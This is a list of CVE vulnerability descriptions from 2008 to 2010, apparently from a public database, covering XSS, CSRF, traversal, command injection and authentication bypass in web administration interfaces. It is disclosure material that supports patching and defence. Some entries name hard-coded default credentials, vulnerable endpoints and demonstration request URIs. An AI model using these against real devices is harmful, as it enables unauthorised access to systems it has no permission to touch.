[CVE-2010-3892] Session fixation vulnerability in the login form in the administrator interface in IBM OmniFind Enterprise Edition 8.x and 9.x allows remote attackers to hijack web sessions by replaying a session ID (aka SID) value.
[CVE-2010-3890] Cross-site scripting (XSS) vulnerability in IBM OmniFind Enterprise Edition before 9.1 allows remote attackers to inject arbitrary web script or HTML via the command parameter to the administration interface, as demonstrated by the command parameter to ESAdmin/collection.do.
[CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3684] The FTP authentication module in Synology Disk Station 2.x logs passwords to the web application interface in cases of incorrect login attempts, which allows local users to obtain sensitive information by reading a log, a different vulnerability than CVE-2010-2453.
[CVE-2010-3490] Directory traversal vulnerability in page.recordings.php in the System Recordings component in the configuration interface in FreePBX 2.8.0 and earlier allows remote authenticated administrators to create arbitrary files via a .. (dot dot) in the usersnum parameter to admin/config.php, as demonstrated by creating a .php file under the web root.
[CVE-2010-3459] Cross-site scripting (XSS) vulnerability in the Ajax WebMail interface in AXIGEN Mail Server before 7.4.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3056] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.11.x before 2.11.10.1 and 3.x before 3.3.5.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) db_search.php, (2) db_sql.php, (3) db_structure.php, (4) js/messages.php, (5) libraries/common.lib.php, (6) libraries/database_interface.lib.php, (7) libraries/dbi/mysql.dbi.lib.php, (8) libraries/dbi/mysqli.dbi.lib.php, (9) libraries/db_info.inc.php, (10) libraries/sanitizing.lib.php, (11) libraries/sqlparser.lib.php, (12) server_databases.php, (13) server_privileges.php, (14) setup/config.php, (15) sql.php, (16) tbl_replace.php, and (17) tbl_sql.php.
[CVE-2010-3037] goform/websXMLAdminRequestCgi.cgi in Cisco Unified Videoconferencing (UVC) System 5110 and 5115, and possibly Unified Videoconferencing System 3545 and 5230, Unified Videoconferencing 3527 Primary Rate Interface (PRI) Gateway, Unified Videoconferencing 3522 Basic Rate Interfaces (BRI) Gateway, and Unified Videoconferencing 3515 Multipoint Control Unit (MCU), allows remote authenticated administrators to execute arbitrary commands via the username field, related to a "shell command injection vulnerability," aka Bug ID CSCti54059.
[CVE-2010-2986] Cross-site scripting (XSS) vulnerability in webacs/QuickSearchAction.do in the search feature in the web interface in Cisco Wireless Control System (WCS) before 6.0(194.0) and 7.x before 7.0.164 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter, aka Bug ID CSCtf14288.
[CVE-2010-2732] Open redirect vulnerability in the web interface in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka "UAG Redirection Spoofing Vulnerability."
[CVE-2010-2644] IBM WebSphere Service Registry and Repository (WSRR) 7.0.0 before FP1 does not properly implement access control, which allows remote attackers to perform governance actions via unspecified API requests to an EJB interface.
[CVE-2010-2594] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in InterSect Alliance Snare Agent 3.2.3 and earlier on Solaris, Snare Agent 3.1.7 and earlier on Windows, Snare Agent 1.5.0 and earlier on Linux and AIX, Snare Agent 1.4 and earlier on IRIX, Snare Epilog 1.5.3 and earlier on Windows, and Snare Epilog 1.2 and earlier on UNIX allow remote attackers to hijack the authentication of administrators for requests that (1) change the password or (2) change the listening port.
[CVE-2010-2453] Multiple cross-site scripting (XSS) vulnerabilities in Synology Disk Station 2.x before DSM3.0-1337 allow remote attackers to inject arbitrary web script or HTML by connecting to the FTP server and providing a crafted (1) USER or (2) PASS command, which is written by the FTP logging module to a web-interface log window, related to a "web commands injection" issue.
[CVE-2010-2428] Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request.
[CVE-2010-2293] The Ping tools web interface in Dlink Di-604 router allows remote authenticated users to cause a denial of service via a large "ip textfield" size.
[CVE-2010-2292] Cross-site scripting (XSS) vulnerability in the Ping tools web interface in Dlink Di-604 router allows remote attackers to inject arbitrary web script or HTML via the IP field.
[CVE-2010-2291] Unspecified vulnerability in the web interface in snom VoIP Phone firmware 8 before 8.2.35 allows remote attackers to bypass intended restrictions and modify user credentials via unknown vectors. NOTE: some of these details are obtained from third party information.
[CVE-2010-2228] Cross-site scripting (XSS) vulnerability in the MNET access-control interface in Moodle before 1.8.13 and 1.9.x before 1.9.9 allows remote attackers to inject arbitrary web script or HTML via vectors involving extended characters in a username.
[CVE-2010-2116] The web interface in McAfee Email Gateway (formerly IronMail) 6.7.1 allows remote authenticated users, with only Read privileges, to gain Write privileges to modify configuration via the save action in a direct request to admin/systemWebAdminConfig.do.
[CVE-2010-2082] The web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 has a default administrative password (aka SAPassword) of W2402, which makes it easier for remote attackers to obtain privileged access.
[CVE-2010-2026] The web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 allows remote attackers to bypass authentication, and reset the modem or replace the firmware, via a direct request to an unspecified page.
[CVE-2010-2025] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 allow remote attackers to hijack the authentication of administrators for requests that (1) reset the modem, (2) erase the firmware, (3) change the administrative password, (4) install modified firmware, or (5) change the access level, as demonstrated by a request to goform/_aslvl.
[CVE-2010-1985] Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in Six Apart Movable Type 5.0 and 5.01 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2010-1913] The default configuration of pluginlicense.ini for the SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance, when downloaded from a server operated by Telefonica or possibly other companies, contains an incorrect DNS whitelist that includes the DNS hostnames of home computers of many persons, which allows remote attackers to bypass intended restrictions on ActiveX execution by hosting an ActiveX control on an applicable home web server.
[CVE-2010-1912] The SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance allows remote attackers to bypass intended restrictions on ActiveX execution via "instantiation/free attacks."
[CVE-2010-1911] The site-locking implementation in the SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance relies on a list of server domain names to restrict execution of ActiveX controls, which makes it easier for man-in-the-middle attackers to execute arbitrary code via a DNS hijacking attack.
[CVE-2010-1757] WebKit in Apple iOS before 4 on the iPhone and iPod touch does not enforce the expected boundary restrictions on content display by an IFRAME element, which allows remote attackers to spoof the user interface via a crafted HTML document.
[CVE-2010-1748] The cgi_initialize_string function in cgi-bin/var.c in the web interface in CUPS before 1.4.4, as used on Apple Mac OS X 10.5.8, Mac OS X 10.6 before 10.6.4, and other platforms, does not properly handle parameter values containing a % (percent) character without two subsequent hex characters, which allows context-dependent attackers to obtain sensitive information from cupsd process memory via a crafted request, as demonstrated by the (1) /admin?OP=redirect&URL=% and (2) /admin?URL=/admin/&OP=% URIs.
[CVE-2010-1612] The IBM WebSphere DataPower XML Accelerator XA35, Low Latency Appliance XM70, Integration Appliance XI50, B2B Appliance XB60, and XML Security Gateway XS40 SOA Appliances before 3.8.0.0, when a QLOGIC Ethernet interface is used, allow remote attackers to cause a denial of service (interface outage) via malformed ICMP packets to the 0.0.0.0 destination IP address.
[CVE-2010-1607] Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
[CVE-2010-1573] Linksys WAP54Gv3 firmware 3.04.03 and earlier uses a hard-coded username (Gemtek) and password (gemtekswd) for a debug interface for certain web pages, which allows remote attackers to execute arbitrary commands via the (1) data1, (2) data2, or (3) data3 parameters to (a) Debug_command_page.asp and (b) debug.cgi.
[CVE-2010-1530] Multiple cross-site scripting (XSS) vulnerabilities in the Internationalization module 6.x before 6.x-1.4 for Drupal allow remote authenticated users, with translate interface or administer blocks privileges, to inject arbitrary web script or HTML via (1) strings used in block translation or (2) the untranslated input.
[CVE-2010-1243] The IBM Web Interface for Content Management (aka WEBi) before 1.0.4 creates persistent cookies on client workstations, which has unspecified impact and attack vectors.
[CVE-2010-1242] Multiple cross-site scripting (XSS) vulnerabilities in the IBM Web Interface for Content Management (aka WEBi) before 1.0.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-1107] Cross-site scripting (XSS) vulnerability in the Recent Comments module 5.x through 5.x-1.2 and 6.x through 6.x-1.0 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via a "custom block title interface."
[CVE-2010-0540] Cross-site request forgery (CSRF) vulnerability in the web interface in CUPS before 1.4.4, as used on Apple Mac OS X 10.5.8, Mac OS X 10.6 before 10.6.4, and other platforms, allows remote attackers to hijack the authentication of administrators for requests that change settings.
[CVE-2010-0418] The web interface in chumby one before 1.0.4 and chumby classic before 1.7.2 allows remote attackers to execute arbitrary commands via shell metacharacters in a request.
[CVE-2010-0214] The administrative interface on the PolyVision RoomWizard with firmware 3.2.3 places the Sync Connector Active Directory (AD) credentials in a web form that is accessed over HTTP on port 80, which allows remote attackers to obtain sensitive information by reading the HTML source code corresponding to the /admin/sign/DeviceSynch URI.
[CVE-2010-0152] Multiple cross-site scripting (XSS) vulnerabilities in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5.0.2 allow remote attackers to inject arbitrary web script or HTML via (1) the date1 parameter to pvm_messagestore.php, (2) the userfilter parameter to pvm_user_management.php, (3) the ping parameter to sys_tools.php in a sys_ping.php action, (4) the action parameter to pvm_cert_commaction.php, (5) the action parameter to pvm_cert_serveraction.php, (6) the action parameter to pvm_smtpstore.php, (7) the l parameter to sla/index.php, or (8) unspecified stored data
[CVE-2010-0140] Multiple unspecified vulnerabilities in the web server in Cisco Unified MeetingPlace 7 before 7.0(2.3) hotfix 5F, 6 before 6.0.639.3, and possibly 5 allow remote attackers to create (1) user or (2) administrator accounts via a crafted URL in a request to the internal interface, aka Bug IDs CSCtc59231 and CSCtd40661.
[CVE-2009-5092] Cross-site scripting (XSS) vulnerability in the management interface in Microsoft FAST ESP 5.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4896] Multiple directory traversal vulnerabilities in the mlmmj-php-admin web interface for Mailing List Managing Made Joyful (mlmmj) 1.2.15 through 1.2.17 allow remote authenticated users to overwrite, create, or delete arbitrary files, or determine the existence of arbitrary directories, via a .. (dot dot) in a list name in a (1) edit or (2) save action.
[CVE-2009-4658] Xerver 4.32 allows remote authenticated users to cause a denial of service (daemon crash) via a non-numeric web port assignment in the management interface. NOTE: this can be leveraged by non-authenticated attackers using CVE-2009-4657.
[CVE-2009-4646] Static code injection vulnerability in the administrative web interface in Accellion Secure File Transfer Appliance allows remote authenticated administrators to inject arbitrary shell commands by appending them to a request to update the SNMP public community string.
[CVE-2009-4511] Multiple directory traversal vulnerabilities in the web administration interface on the TANDBERG Video Communication Server (VCS) before X5.1 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the page parameter to (1) helppage.php or (2) user/helppage.php.
[CVE-2009-4357] CQWeb (aka the web interface) in IBM Rational ClearQuest before 7.1.1 does not properly handle use of legacy URLs for automatic login, which might allow attackers to discover the passwords for user accounts via unspecified vectors.
[CVE-2009-4149] Cross-site scripting (XSS) vulnerability in the web interface in CA Service Desk 12.1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
[CVE-2009-3832] Opera before 10.01 on Windows does not prevent use of Web fonts in rendering the product's own user interface, which allows remote attackers to spoof the address field via a crafted web site.
[CVE-2009-3828] The web interface for Everfocus EDR1600 DVR allows remote attackers to bypass authentication and access live cams via certain vectors.
[CVE-2009-3701] Multiple cross-site scripting (XSS) vulnerabilities in the administration interface in Horde Application Framework before 3.3.6, Horde Groupware before 1.2.5, and Horde Groupware Webmail Edition before 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) phpshell.php, (2) cmdshell.php, or (3) sqlshell.php in admin/, related to the PHP_SELF variable.
[CVE-2009-3653] Cross-site scripting (XSS) vulnerability in the additional links interface in XML Sitemap 5.x-1.6, a module for Drupal, allows remote authenticated users, with "administer site configuration" permission, to inject arbitrary web script or HTML via unspecified vectors, related to link path output.
[CVE-2009-3487] Multiple cross-site scripting (XSS) vulnerabilities in the J-Web interface in Juniper JUNOS 8.5R1.14 allow remote authenticated users to inject arbitrary web script or HTML via (1) the JEXEC_OUTID parameter in a JEXEC_MODE_RELAY_OUTPUT action to the jexec program
[CVE-2009-3486] Multiple cross-site scripting (XSS) vulnerabilities in the J-Web interface in Juniper JUNOS 8.5R1.14 allow remote authenticated users to inject arbitrary web script or HTML via the host parameter to (1) the pinghost program, reachable through the diagnose program
[CVE-2009-3485] Cross-site scripting (XSS) vulnerability in the J-Web interface in Juniper JUNOS 8.5R1.14 and 9.0R1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI.
[CVE-2009-2968] Directory traversal vulnerability in a support component in the web interface in VMware Studio 2.0 public beta before build 1017-185256 allows remote attackers to upload files to arbitrary locations via unspecified vectors.
[CVE-2009-2898] Cross-site scripting (XSS) vulnerability in the Alerts list feature in the web interface in SpringSource Hyperic HQ 3.2.x before 3.2.6.1, 4.0.x before 4.0.3.1, 4.1.x before 4.1.2.1, and 4.2-beta1
[CVE-2009-2897] Multiple cross-site scripting (XSS) vulnerabilities in hq/web/common/GenericError.jsp in the generic exception handler in the web interface in SpringSource Hyperic HQ 3.2.x before 3.2.6.1, 4.0.x before 4.0.3.1, 4.1.x before 4.1.2.1, and 4.2-beta1
[CVE-2009-2851] Cross-site scripting (XSS) vulnerability in the administrator interface in WordPress before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via a comment author URL.
[CVE-2009-2820] The web interface in CUPS before 1.4.2, as used on Apple Mac OS X before 10.6.2 and other platforms, does not properly handle (1) HTTP headers and (2) HTML templates, which allows remote attackers to conduct cross-site scripting (XSS) attacks and HTTP response splitting attacks via vectors related to (a) the product's web interface, (b) the configuration of the print system, and (c) the titles of printed jobs, as demonstrated by an XSS attack that uses the kerberos parameter to the admin program, and leverages attribute injection and HTTP Parameter Pollution (HPP) issues.
[CVE-2009-2747] The Java Naming and Directory Interface (JNDI) implementation in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.39, 6.1 before 6.1.0.29, and 7.0 before 7.0.0.7 does not properly restrict access to UserRegistry object methods, which allows remote attackers to obtain sensitive information via a crafted method call.
[CVE-2009-2583] Multiple session fixation vulnerabilities in IBM Tivoli Identity Manager (ITIM) 5.0.0.6 allow remote attackers to hijack web sessions via unspecified vectors involving the (1) console and (2) self service interfaces.
[CVE-2009-2454] Cross-site scripting (XSS) vulnerability in Citrix Web Interface 4.6, 5.0, and 5.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2344] The web-based management interfaces in Sourcefire Defense Center (DC) and 3D Sensor before 4.8.2 allow remote authenticated users to gain privileges via a $admin value for the admin parameter in an edit action to admin/user/user.cgi and unspecified other components.
[CVE-2009-2323] The web interface on the Axesstel MV 410R redirects users back to the referring page after execution of some CGI scripts, which makes it easier for remote attackers to avoid detection of cross-site request forgery (CSRF) attacks, as demonstrated by a redirect from the cgi-bin/wireless.cgi script.
[CVE-2009-2320] The web interface on the Axesstel MV 410R relies on client-side JavaScript code to validate input, which allows remote attackers to send crafted data, and possibly have unspecified other impact, via a client that does not process JavaScript.
[CVE-2009-2316] Multiple cross-site scripting (XSS) vulnerabilities in IBM Tivoli Identity Manager (ITIM) 5.0 allow remote attackers to inject arbitrary web script or HTML by entering an unspecified URL in (1) the self-service UI interface or (2) the console interface. NOTE: it was later reported that 4.6.0 is also affected by the first vector.
[CVE-2009-2300] The management interface in the phion airlock Web Application Firewall (WAF) 4.1-10.41 does not properly handle CGI requests that specify large width and height parameters for an image, which allows remote attackers to execute arbitrary commands or cause a denial of service (resource consumption) via a crafted request.
[CVE-2009-2271] The Huawei D100 has (1) a certain default administrator password for the web interface, and does not force a password change
[CVE-2009-2258] Directory traversal vulnerability in cgi-bin/webcm in the administrative web interface on the Netgear DG632 with firmware 3.4.0_ap allows remote attackers to list arbitrary directories via a .. (dot dot) in the nextpage parameter.
[CVE-2009-2257] The administrative web interface on the Netgear DG632 with firmware 3.4.0_ap allows remote attackers to bypass authentication via a direct request to (1) gateway/commands/saveconfig.html, and (2) stattbl.htm, (3) modemmenu.htm, (4) onload.htm, (5) form.css, (6) utility.js, and possibly (7) indextop.htm in html/.
[CVE-2009-2256] The administrative web interface on the Netgear DG632 with firmware 3.4.0_ap allows remote attackers to cause a denial of service (web outage) via an HTTP POST request to cgi-bin/firmwarecfg.
[CVE-2009-2119] Cross-site scripting (XSS) vulnerability in the login interface (my.logon.php3) in F5 FirePass SSL VPN 5.5 through 5.5.2 and 6.0 through 6.0.3 allows remote attackers to inject arbitrary web script or HTML via a base64-encoded xcho parameter.
[CVE-2009-2079] Cross-site scripting (XSS) vulnerability in the administrative page interface in Taxonomy manager 5.x before 5.x-1.2 and 6.x before 6.x-1.1, a module for Drupal, allows remote authenticated users, with administer taxonomy privileges or the ability to use free tagging to add taxonomy terms, to inject arbitrary web script or HTML via (1) vocabulary names, (2) synonyms, and (3) term names.
[CVE-2009-2076] Cross-site scripting (XSS) vulnerability in Views 6.x before 6.x-2.6, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via (1) exposed filters in the Views UI administrative interface and in the (2) view name parameter in the define custom views feature. NOTE: vector 2 is only exploitable by users with administer views permissions.
[CVE-2009-2048] Cross-site scripting (XSS) vulnerability in the Administration interface in Cisco Customer Response Solutions (CRS) before 7.0(1) SR2 in Cisco Unified Contact Center Express (aka CCX) server allows remote authenticated users to inject arbitrary web script or HTML into the CCX database via unspecified vectors.
[CVE-2009-1769] The web interface in Open Computer and Software Inventory Next Generation (OCS Inventory NG) 1.01 generates different error messages depending on whether a username is valid, which allows remote attackers to enumerate valid usernames.
[CVE-2009-1484] Cross-site scripting (XSS) vulnerability in the web mail interface feature in AXIGEN Mail Server 6.2.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving e-mail messages. NOTE: the provenance of this information is unknown
[CVE-2009-1477] The https web interfaces on the ATEN KH1516i IP KVM switch with firmware 1.0.063, the KN9116 IP KVM switch with firmware 1.1.104, and the PN9108 power-control unit have a hardcoded SSL private key, which makes it easier for remote attackers to decrypt https sessions by extracting this key from their own switch and then sniffing network traffic to a switch owned by a different customer.
[CVE-2009-1333] Cross-site scripting (XSS) vulnerability in refresh_rate.htm in the web interface on the HP Deskjet 6840 printer with firmware XF1M131A allows remote attackers to inject arbitrary web script or HTML via the POST request body.
[CVE-2009-1290] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration interface in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to hijack the authentication of administrators, as demonstrated by a power-off request to the private/blade_power_action script.
[CVE-2009-1166] The administrative web interface on the Cisco Wireless LAN Controller (WLC) platform 4.x before 4.2.205.0 and 5.x before 5.2.191.0, as used in Cisco 1500 Series, 2000 Series, 2100 Series, 4100 Series, 4200 Series, and 4400 Series Wireless Services Modules (WiSM), WLC Modules for Integrated Services Routers, and Catalyst 3750G Integrated Wireless LAN Controllers, allows remote attackers to cause a denial of service (device reload) via a crafted (1) HTTP or (2) HTTPS request, aka Bug ID CSCsy27708.
[CVE-2009-1164] The administrative web interface on the Cisco Wireless LAN Controller (WLC) platform 4.2 before 4.2.205.0 and 5.x before 5.2.178.0, as used in Cisco 1500 Series, 2000 Series, 2100 Series, 4100 Series, 4200 Series, and 4400 Series Wireless Services Modules (WiSM), WLC Modules for Integrated Services Routers, and Catalyst 3750G Integrated Wireless LAN Controllers, allows remote attackers to cause a denial of service (device reload) via a malformed response to a (1) HTTP or (2) HTTPS authentication request, aka Bug ID CSCsx03715.
[CVE-2009-1048] The web interface on the snom VoIP phones snom 300, snom 320, snom 360, snom 370, and snom 820 with firmware 6.5 before 6.5.20, 7.1 before 7.1.39, and 7.3 before 7.3.14 allows remote attackers to bypass authentication, and reconfigure the phone or make arbitrary use of the phone, via a (1) http or (2) https request with 127.0.0.1 in the Host header.
[CVE-2009-0933] Cross-site scripting (XSS) vulnerability in the administrative interface in Dotclear before 2.1.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0860] Cross-site scripting (XSS) vulnerability in the web user interface in the login application in NetMRI 3.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to error pages.
[CVE-2009-0816] Multiple cross-site scripting (XSS) vulnerabilities in the backend user interface in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 allow remote attackers to inject arbitrary web script or HTML via unspecified fields.
[CVE-2009-0680] cgi-bin/welcome/VPN_only in the web interface in Netgear SSL312 allows remote attackers to cause a denial of service (device crash) via a crafted query string, as demonstrated using directory traversal sequences.
[CVE-2009-0548] Cross-site scripting (XSS) vulnerability in the Additional Report Settings interface in ESET Remote Administrator before 3.0.105 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information.
[CVE-2009-0474] The web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allows remote attackers to obtain "internal web page information" and "internal information about the module" via unspecified vectors. NOTE: this may overlap CVE-2002-1603.
[CVE-2009-0473] Open redirect vulnerability in the web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2009-0472] Multiple cross-site scripting (XSS) vulnerabilities in the web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-0164] The web interface for CUPS before 1.3.10 does not validate the HTTP Host header in a client request, which makes it easier for remote attackers to conduct DNS rebinding attacks.
[CVE-2009-0030] A certain Red Hat patch for SquirrelMail 1.4.8 sets the same SQMSESSID cookie value for all sessions, which allows remote authenticated users to access other users' folder lists and configuration data in opportunistic circumstances by using the standard webmail.php interface. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3663.
[CVE-2008-7283] Open Ticket Request System (OTRS) before 2.2.6, when customer group support is enabled, allows remote authenticated users to bypass intended access restrictions and perform web-interface updates to tickets by leveraging queue read permissions.
[CVE-2008-7166] Buffer overflow in the web interface in BitTorrent 6.0.1 (build 7859) and earlier, and uTorrent 1.7.6 (build 7859) and earlier, allows remote attackers to cause a denial of service (memory consumption and crash) via a crafted Range header. NOTE: this is probably a different vulnerability than CVE-2008-0071 and CVE-2008-0364.
[CVE-2008-7115] The web interface to the Belkin Wireless G router and ADSL2 modem F5D7632-4V6 with firmware 6.01.08 allows remote attackers to bypass authentication and gain administrator privileges via a direct request to (1) statusprocess.exe, (2) system_all.exe, or (3) restore.exe in cgi-bin/. NOTE: the setup_dns.exe vector is already covered by CVE-2008-1244.
[CVE-2008-6954] The web interface (CobblerWeb) in Cobbler before 1.2.9 allows remote authenticated users to execute arbitrary Python code in cobblerd by editing a Cheetah kickstart template to import arbitrary Python modules.
[CVE-2008-6830] The disconnection feature in Citrix Web Interface 5.0 and 5.0.1 for Java Application Servers does not properly terminate a user's web interface session, which allows attackers with access to the same browser instance to gain access to the user's Web Interface session. NOTE: the attacker must also have valid credentials to the Web Interface.
[CVE-2008-6711] Unspecified vulnerability in the Web administration interface in Avaya Communication Manager 3.1.x before CM 3.1.4 SP2 and 4.0.x before 4.0.3 SP1 allows remote authenticated users to execute arbitrary commands via unknown vectors related to "viewing system logs."
[CVE-2008-6710] Unspecified vulnerability in the Web administration interface in Avaya Communication Manager 3.1.x before CM 3.1.4 SP2 and 4.0.x before 4.0.3 SP1 allows remote authenticated administrators to gain root privileges via unknown vectors related to "configuring data viewing or restoring credentials."
[CVE-2008-6709] Unspecified vulnerability in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, allows remote authenticated users to execute arbitrary commands via unknown vectors related to configuration of "local data viewing or restoring parameters."
[CVE-2008-6708] Unspecified vulnerability in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x and 4.x, allows remote authenticated administrators to gain root privileges via unknown vectors related to configuration of "data viewing or restoring parameters."
[CVE-2008-6707] The Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, does not perform authentication for certain functionality, which allows remote attackers to obtain sensitive information and access restricted functionality via (1) the certificate installation utility, (2) unspecified scripts in the objects folder, (3) an "unnecessary default application," (4) unspecified scripts in the states folder, (5) an unspecified "default application" that lists server configuration, and (6) "full system help."
[CVE-2008-6706] Multiple unspecified vulnerabilities in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, allow remote attackers to obtain (1) application server configuration, (2) database server configuration including encrypted passwords, (3) a system utility that decrypts "subscriber table passwords," (4) a system utility that decrypts database passwords, and (5) a system utility that encrypts "subscriber table passwords."
[CVE-2008-6605] Cross-site request forgery (CSRF) vulnerability in the xslt script in the web-based management interface on the 2wire 1701HG, 1800HW, 2071HG, and 2700HG with firmware 3.17.5, 3.7.1, 4.25.19, or 5.29.51 allows remote attackers to hijack the intranet connectivity of arbitrary users for requests that cause a denial of service (network outage) via a page parameter with a % (percent) character followed by a non-alphanumeric character.
[CVE-2008-6573] Multiple SQL injection vulnerabilities in Avaya SIP Enablement Services (SES) in Avaya Communication Manager 3.x, 4.0, and 5.0 (1) allow remote attackers to execute arbitrary SQL commands via unspecified vectors related to profiles in the SIP Personal Information Manager (SPIM) in the web interface
[CVE-2008-6479] Cross-site request forgery (CSRF) vulnerability in the "change password" feature in the VZPP web interface for Parallels Virtuozzo 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to modify the password via a link or IMG tag to vz/cp/pwd.
[CVE-2008-6478] Cross-site request forgery (CSRF) vulnerability in the file manager in the VZPP web interface for Parallels Virtuozzo 365.6.swsoft (build 4.0.0-365.6.swsoft) and 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to create and delete arbitrary files as the administrator via a link or IMG tag to (1) create-file and (2) list-control in vz/cp/vzdir/infrman/envs/files/
[CVE-2008-6395] The web management interface in 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point allows remote attackers to cause a denial of service (device crash) via a malformed HTTP POST request.
[CVE-2008-6229] Cross-site scripting (XSS) vulnerability in the administrative interface in Drupal Content Construction Kit (CCK) 5.x before 5.x-1.10 and 6.x before 6.x-2.0, a module for Drupal, allows remote authenticated users with "administer content" permissions to inject arbitrary web script or HTML via (1) field labels and (2) content-type names.
[CVE-2008-6122] The web management interface in Netgear WGR614v9 allows remote attackers to cause a denial of service (crash) via a request that contains a question mark ("?").
[CVE-2008-6096] Cross-site scripting (XSS) vulnerability in Juniper NetScreen ScreenOS before 5.4r10, 6.0r6, and 6.1r2 allows remote attackers to inject arbitrary web script or HTML via the user name parameter to the (1) web interface login page or the (2) telnet login page.
[CVE-2008-5906] Eval injection vulnerability in the web interface plugin in KTorrent before 3.1.4 allows remote attackers to execute arbitrary PHP code via unspecified parameters to this interface's PHP scripts.
[CVE-2008-5905] The web interface plugin in KTorrent before 3.1.4 allows remote attackers to bypass intended access restrictions and upload arbitrary torrent files, and trigger the start of downloads and seeding, via a crafted HTTP POST request.
[CVE-2008-5710] Multiple unspecified vulnerabilities in the web management interface in Avaya Communication Manager (CM) 3.1.x, 4.0.3, and 5.x allow remote attackers to read (1) configuration files, (2) log files, (3) binary image files, and (4) help files via unknown vectors.
[CVE-2008-5709] Multiple unspecified vulnerabilities in the web management interface in Avaya Communication Manager (CM) 3.1 before 3.1.4 SP2, 4.0 before 4.0.3 SP1, and 5.0 before 5.0 SP3 allow remote authenticated users to execute arbitrary code via unknown attack vectors in the (1) Set Static Routes and (2) Backup History components.
[CVE-2008-5517] The web interface in git (gitweb) 1.5.x before 1.5.6 allows remote attackers to execute arbitrary commands via shell metacharacters related to (1) git_snapshot and (2) git_object.
[CVE-2008-5516] The web interface in git (gitweb) 1.5.x before 1.5.5 allows remote attackers to execute arbitrary commands via shell metacharacters related to git_search.
[CVE-2008-5330] Multiple cross-site scripting (XSS) vulnerabilities in the web interface in ClearCase RWP server in IBM Rational ClearCase 7.0.0 before 7.0.0.4, and 7.0.1.1-RATL-RCC-IFIX02 and possibly other 7.0.1 versions before 7.0.1.3, allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO of a URI associated with a VOB page.
[CVE-2008-5315] Directory traversal vulnerability in the web interface in Apple iPhone Configuration Web Utility 1.0 on Windows allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2008-5266] Cross-site scripting (XSS) vulnerability in configuration/httpListenerEdit.jsf in the GlassFish 2 UR2 b04 webadmin interface in Sun Java System Application Server 9.1_01 build b09d-fcs and 9.1_02 build b04-fcs allows remote attackers to inject arbitrary web script or HTML via the name parameter, a different vector than CVE-2008-2751.
